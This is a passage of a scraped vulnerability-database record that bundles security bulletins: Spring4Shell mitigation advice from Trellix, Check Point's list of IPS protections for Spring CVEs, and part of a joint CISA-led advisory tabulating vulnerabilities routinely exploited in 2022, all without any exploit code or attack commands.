vulnerable](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#am-i-impacted>).\n\nI lied earlier, there\u2019s even worse news. [Trend Micro has reported](<https://www.trendmicro.com/en_be/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html>) that Spring4Shell is already being utilized in an extensive campaign that, in the spirit of Easter, has resurrected the [Mirai botnet](<https://www.cloudflare.com/learning/ddos/glossary/mirai-botnet/>) malware. Doesn\u2019t it just fill you with nostalgia?\n\n### What can I do?\n\nWhile updating Spring Framework to 5.2.20/5.3.18 or above is obviously the best solution, Spring has also outlined [several mitigation strategies](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds>) in their security guidance:\n\n * Upgrade Tomcat to at least 8.5.78/9.0.62/10.0.20. While this does not mitigate the vulnerability as a whole, it does mitigate the Tomcat attack vector, which is by far the most prevalent way this vuln is being exploited.\n * Downgrading Java to a version below 9 removes the Module bypass that makes CVE-2022-22965 possible; however, utilizing a prehistoric version of Java likely carries its own security risks.\n * Whitelisting only the parameters you want to allow your users to bind via the `[setAllowedFields()](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html#setAllowedFields-java.lang.String...->)` method is a valid mitigation, as is blacklisting the fields used by exploits via `[setDisallowedFields()](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html#setDisallowedFields-java.lang.String...->)`. Unfortunately, setting these fields globally runs the risk of them being overridden locally. To make matters even more complicated, it was discovered that these properties are unintuitively case-sensitive, a quirk that was not clearly documented, leaving holes in many mitigation attempts. The issue is being tracked as [CVE-2022-22968](<https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968>) and is fixed in Spring Framework versions 5.2.21 and 5.3.19. But hey, at least they didn\u2019t tell us it was \u201cworking as intended.\u201d\n", "cvss3": {}, "published": "2022-05-04T00:00:00", "type": "trellix", "title": "The Bug Report \u2013 April 2022 Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-1622", "CVE-2022-21449", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-26809"], "modified": "2022-05-04T00:00:00", "id": "TRELLIX:33C611A7064C89E309C4A45CAE585BD5", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/the-bug-report-april-2022-edition.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_security": [{"lastseen": "2023-04-20T02:09:19", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>), [CVE-2022-22946](<https://vulners.com/cve/CVE-2022-22946>), [CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>), and [CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://vulners.com/cve/CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). \nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://vulners.com/cve/CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T21:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T21:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-30T17:14:30", "description": "### **SUMMARY**\n\nThe following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):\n\n * United States: The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and Federal Bureau of Investigation (FBI)\n * Australia: Australian Signals Directorate\u2019s Australian Cyber Security Centre (ACSC)\n * Canada: Canadian Centre for Cyber Security (CCCS)\n * New Zealand: New Zealand National Cyber Security Centre (NCSC-NZ) and Computer Emergency Response Team New Zealand (CERT NZ)\n * United Kingdom: National Cyber Security Centre (NCSC-UK)\n\nThis advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.\n\nThe authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory\u2014including the following\u2014to reduce the risk of compromise by malicious cyber actors.\n\n * **Vendors, designers, and developers**: Implement [secure-by-design and -default principles and tactics](<https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default> \"Security-by-Design and -Default\" ) to reduce the prevalence of vulnerabilities in your software. \n * **Follow the Secure Software Development Framework (SSDF)**, also known as [SP 800-218](<https://csrc.nist.gov/publications/detail/sp/800-218/final> \"NIST SP 800-218\" ), and implement secure design practices into each stage of the software development life cycle (SDLC). As part of this, establish a coordinated vulnerability disclosure program that includes processes to determine root causes of discovered vulnerabilities.\n * **Prioritize secure-by-default configurations**, such as eliminating default passwords, or requiring addition configuration changes to enhance product security.\n * **Ensure that published CVEs include the proper CWE field** identifying the root cause of the vulnerability.\n * **End-user organizations**: \n * **Apply timely patches to systems**. **Note**: First check for signs of compromise if CVEs identified in this CSA have not been patched.\n * Implement a centralized patch management system.\n * **Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers**.\n * **Ask your software providers to discuss their secure by design program** and to provide links to information about how they are working to remove classes of vulnerabilities and to set secure default settings.\n\nDownload the PDF version of this report:\n\nAA23-215A PDF (PDF, 980.90 KB )\n\n### **TECHNICAL DETAILS**\n\n#### **Key Findings**\n\nIn 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.\n\nMalicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure\u2014the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).\n\nMalicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets\u2019 networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.\n\n#### **Top Routinely Exploited Vulnerabilities**\n\nTable 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )**. **This vulnerability, affecting Fortinet SSL VPNs, was also [routinely exploited in 2020](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a> \"Top Routinely Exploited Vulnerabilities\" ) and [2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a> \"2021 Top Routinely Exploited Vulnerabilities\" ). The continued exploitation indicates that many organizations failed to patch software in a timely manner and remain vulnerable to malicious cyber actors.\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )**, **[**CVE-2021-31207**](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )**, **[**CVE-2021-34523**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )**.** These vulnerabilities, known as ProxyShell, affect Microsoft Exchange email servers. In combination, successful exploitation enables a remote actor to execute arbitrary code. These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft\u2019s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers.\n * [**CVE-2021-40539**](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )**.** This vulnerability enables unauthenticated remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus and was linked to the usage of an outdated third-party dependency. Initial exploitation of this vulnerability [began in late 2021](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-259a> \"APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus\" ) and [continued throughout 2022](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF> \"Top CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors\" ).\n * [**CVE-2021-26084**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )**.** This vulnerability, affecting Atlassian Confluence Server and Data Center (a web-based collaboration tool used by governments and private companies) could enable an unauthenticated cyber actor to execute arbitrary code on vulnerable systems. This vulnerability quickly became one of the most routinely exploited vulnerabilities after a PoC was released within a week of its disclosure. Attempted mass exploitation of this vulnerability was observed in September 2021.\n * [**CVE-2021- 44228**](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )**.** This vulnerability, known as Log4Shell, affects Apache\u2019s Log4j library, an open-source logging framework incorporated into thousands of products worldwide. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code. The request allows a cyber actor to take full control of a system. The actor can then steal information, launch ransomware, or conduct other malicious activity.[[1](<https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance>)] Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021, and continued to show high interest in CVE-2021- 44228 through the first half of 2022.\n * [**CVE-2022-22954**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" ), [**CVE-2022-22960**](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )**.** These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. A malicious cyber actor with network access could trigger a server-side template injection that may result in remote code execution**. **Exploitation of CVE-2022-22954 and CVE-2022-22960 [began in early 2022](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b> \"Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control\" ) and attempts continued throughout the remainder of the year.\n * [**CVE-2022-1388**](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )**.** This vulnerability allows unauthenticated malicious cyber actors to bypass iControl REST authentication** **on F5 BIG-IP application delivery and security software**.**\n * [**CVE-2022-30190**](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )**.** This vulnerability impacts the Microsoft Support Diagnostic Tool (MSDT) in Windows. A remote, unauthenticated cyber actor could exploit this vulnerability to take control of an affected system.\n * [**CVE-2022-26134**](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" ). This critical RCE vulnerability affects Atlassian Confluence and Data Center. The vulnerability, which was likely initially exploited as a zero-day before public disclosure in June 2022, is related to an older Confluence vulnerability ([CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )), which cyber actors also exploited in 2022.\n_Table 1: Top 12 Routinely Exploited Vulnerabilities in 2022_\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Product**\n\n| \n\n**Type**\n\n| \n\n**CWE** \n \n---|---|---|---|--- \n \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379> \"CVE-2018-13379\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS and FortiProxy\n\n| \n\nSSL VPN credential exposure\n\n| \n\n[CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473> \"CVE-2021-34473\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-918 Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \\(SSRF\\)\" ) \n \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207> \"CVE-2021-31207\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nSecurity Feature Bypass\n\n| \n\n[CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523> \"CVE-2021-34523\" )\n\n(Proxy Shell)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nElevation of Privilege\n\n| \n\n[CWE-287 Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html> \"CWE-287: Improper Authentication\" ) \n \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539> \"CVE-2021-40539\" )\n\n| \n\nZoho ManageEngine\n\n| \n\nADSelfService Plus\n\n| \n\nRCE/\n\nAuthentication Bypass\n\n| \n\n[CWE-287 Improper Authentication](<https://cwe.mitre.org/data/definitions/287.html> \"CWE-287: Improper Authentication\" ) \n \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084> \"CVE-2021-26084\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center\n\n| \n\nArbitrary code execution\n\n| \n\n[CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \\('Injection'\\)\" ) \n \n[CVE-2021- 44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228> \"CVE-2021-44228\" )\n\n(Log4Shell)\n\n| \n\nApache\n\n| \n\nLog4j2\n\n| \n\nRCE\n\n| \n\n[CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" )\n\n[CWE-20 Improper Input Validation](<https://cwe.mitre.org/data/definitions/20.html> \"CWE-20: Improper Input Validation\" )\n\n[CWE-400 Uncontrolled Resource Consumption](<https://cwe.mitre.org/data/definitions/400.html> \"CWE-400: Uncontrolled Resource Consumption\" )\n\n[CWE-502 Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html> \"CWE-502: Deserialization of Untrusted Data\" ) \n \n[CVE-2022-22954](<https://nvd.nist.gov/vuln/detail/CVE-2022-22954> \"CVE-2022-22954\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access and Identity Manager\n\n| \n\nRCE\n\n| \n\n[CWE-94 Improper Control of Generation of Code ('Code Injection')](<https://cwe.mitre.org/data/definitions/94.html> \"CWE-94: Improper Control of Generation of Code \\('Code Injection'\\)\" ) \n \n[CVE-2022-22960](<https://nvd.nist.gov/vuln/detail/CVE-2022-22960> \"CVE-2022-22960\" )\n\n| \n\nVMware\n\n| \n\nWorkspace ONE Access, Identity Manager, and vRealize Automation\n\n| \n\nImproper Privilege Management\n\n| \n\n[CWE-269 Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2022-1388](<https://nvd.nist.gov/vuln/detail/CVE-2022-1388> \"CVE-2022-1388\" )\n\n| \n\nF5 Networks\n\n| \n\nBIG-IP\n\n| \n\nMissing Authentication Vulnerability\n\n| \n\n[CWE-306 Missing Authentication for Critical Function](<https://cwe.mitre.org/data/definitions/306.html> \"CWE-306: Missing Authentication for Critical Function\" ) \n \n[CVE-2022-30190](<https://nvd.nist.gov/vuln/detail/CVE-2022-30190> \"CVE-2022-30190\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )\n\n| \n\nAtlassian\n\n| \n\nConfluence Server and Data Center\n\n| \n\nRCE\n\n| \n\n[CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')](<https://cwe.mitre.org/data/definitions/74.html> \"CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component \\('Injection'\\)\" ) \n \n#### **Additional Routinely Exploited Vulnerabilities**\n\nIn addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities\u2014listed in Table 2\u2014that were also routinely exploited by malicious cyber actors in 2022.\n\n_Table 2: Additional Routinely Exploited Vulnerabilities in 2022_\n\n**CVE**\n\n| \n\n**Vendor**\n\n| \n\n**Product**\n\n| \n\n**Type**\n\n| \n\n**CWE** \n \n---|---|---|---|--- \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199> \"CVE-2017-0199\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nArbitrary Code Execution\n\n| \n\nNone Listed \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \"CVE-2017-11882\" )\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nArbitrary Code Execution\n\n| \n\n[CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer](<https://cwe.mitre.org/data/definitions/119.html> \"CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer\" ) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510> \"CVE-2019-11510\" )\n\n| \n\nIvanti\n\n| \n\nPulse Secure Pulse Connect Secure\n\n| \n\nArbitrary File Reading\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708> \"CVE-2019-0708\" )\n\n| \n\nMicrosoft\n\n| \n\nRemote Desktop Services\n\n| \n\nRCE\n\n| \n\n[CWE-416: Use After Free](<https://cwe.mitre.org/data/definitions/416.html> \"CWE-416: Use After Free\" ) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781> \"CVE-2019-19781\" )\n\n| \n\nCitrix\n\n| \n\nApplication Delivery Controller and Gateway\n\n| \n\nArbitrary Code Execution\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902> \"CVE-2020-5902\" )\n\n| \n\nF5 Networks\n\n| \n\nBIG-IP\n\n| \n\nRCE\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472> \"CVE-2020-1472\" )\n\n| \n\nMicrosoft\n\n| \n\nMultiple Products\n\n| \n\nPrivilege Escalation\n\n| \n\n[CWE-330: Use of Insufficiently Random Values](<https://cwe.mitre.org/data/definitions/330.html> \"CWE-330: Use of Insufficiently Random Values\" ) \n \n[CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882> \"CVE-2020-14882\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2020-14883](<https://nvd.nist.gov/vuln/detail/CVE-2020-14883> \"CVE-2020-14883\" )\n\n| \n\nOracle\n\n| \n\nWebLogic Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2021-20016](<https://nvd.nist.gov/vuln/detail/CVE-2021-20016> \"CVE-2021-20016\" )\n\n| \n\nSonicWALL\n\n| \n\nSSLVPN SMA100\n\n| \n\nSQL Injection\n\n| \n\n[CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')](<https://cwe.mitre.org/data/definitions/89.html> \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command \\('SQL Injection'\\)\" ) \n \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855> \"CVE-2021-26855\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \\(SSRF\\)\" ) \n \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065> \"CVE-2021-27065\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858> \"CVE-2021-26858\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\nNone Listed \n \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857> \"CVE-2021-26857\" )\n\n(ProxyLogon)\n\n| \n\nMicrosoft\n\n| \n\nExchange Server\n\n| \n\nRCE\n\n| \n\n[CWE-502: Deserialization of Untrusted Data](<https://cwe.mitre.org/data/definitions/502.html> \"CWE-502: Deserialization of Untrusted Data\" ) \n \n[CVE-2021-20021](<https://nvd.nist.gov/vuln/detail/CVE-2021-20021> \"CVE-2021-20021\" )\n\n| \n\nSonicWALL\n\n| \n\nEmail Security\n\n| \n\nPrivilege Escalation Exploit Chain\n\n| \n\n[CWE-269: Improper Privilege Management](<https://cwe.mitre.org/data/definitions/269.html> \"CWE-269: Improper Privilege Management\" ) \n \n[CVE-2021-40438](<https://nvd.nist.gov/vuln/detail/CVE-2021-40438> \"CVE-2021-40438\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer-Side Request Forgery\n\n| \n\n[CWE-918: Server-Side Request Forgery (SSRF)](<https://cwe.mitre.org/data/definitions/918.html> \"CWE-918: Server-Side Request Forgery \\(SSRF\\)\" ) \n \n[CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \"CVE-2021-41773\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer Path Traversal\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"\u00a0CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013> \"CVE-2021-42013\" )\n\n| \n\nApache\n\n| \n\nHTTP Server\n\n| \n\nServer Path Traversal\n\n| \n\n[CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](<https://cwe.mitre.org/data/definitions/22.html> \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory \\('Path Traversal'\\)\" ) \n \n[CVE-2021-20038](<https://nvd.nist.gov/vuln/detail/CVE-2021-20038> \"CVE-2021-20038\" )\n\n| \n\nSonicWall\n\n| \n\nSMA 100 Series Appliances\n\n| \n\nStack-based Buffer Overflow\n\n| \n\n[CWE-787: Out-of-bounds Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" )\n\n[CWE-121: Stack-based Buffer Overflow](<http://cwe.mitre.org/data/definitions/121.html> \"CWE-121: Stack-based Buffer Overflow\" ) \n \n[CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046> \"CVE-2021-45046\" )\n\n| \n\nApache\n\n| \n\nLog4j\n\n| \n\nRCE\n\n| \n\n[CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')](<https://cwe.mitre.org/data/definitions/917.html> \"CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement \\('Expression Language Injection'\\)\" ) \n \n[CVE-2022-42475](<https://nvd.nist.gov/vuln/detail/CVE-2022-42475> \"CVE-2022-42475\" )\n\n| \n\nFortinet\n\n| \n\nFortiOS\n\n| \n\nHeap-based Buffer Overflow\n\n| \n\n[CWE-787: Out-of-bounds Write](<https://cwe.mitre.org/data/definitions/787.html> \"CWE-787: Out-of-bounds Write\" ) \n \n[CVE-2022-24682](<https://nvd.nist.gov/vuln/detail/CVE-2022-24682> \"CVE-2022-24682\" )\n\n| \n\nZimbra\n\n| \n\nCollaboration Suite\n\n| \n\n\u2018Cross-site Scripting\u2019\n\n| \n\n[CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](<https://cwe.mitre.org/data/definitions/79.html> \"CWE-79: Improper Neutralization of Input During Web Page Generation \\('Cross-site Scripting'\\)\" ) \n \n[CVE-2022-22536](<https://nvd.nist.gov/vuln/detail/CVE-2022-22536> \"CVE-2022-22536\" )\n\n| \n\nSAP\n\n| \n\nInternet Communication Manager (ICM)\n\n| \n\nHTTP Request Smuggling\n\n| \n\n[CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')](<https://cwe.mitre.org/data/definitions/444.html> \"CWE-444: Inconsistent Interpretation of HTTP Requests \\('HTTP Request/Response Smuggling'\\)\" ) \n \n[CVE-2022-22963](<https://nvd.nist.gov/vuln/detail/CVE-2022-22963> \"CVE-2022-22963\" )\n\n| \n\nVMware Tanzu\n\n| \n\nSpring Cloud\n\n| \n\nRCE\n\n| \n\n[CWE-94: Improper Control of Generation of 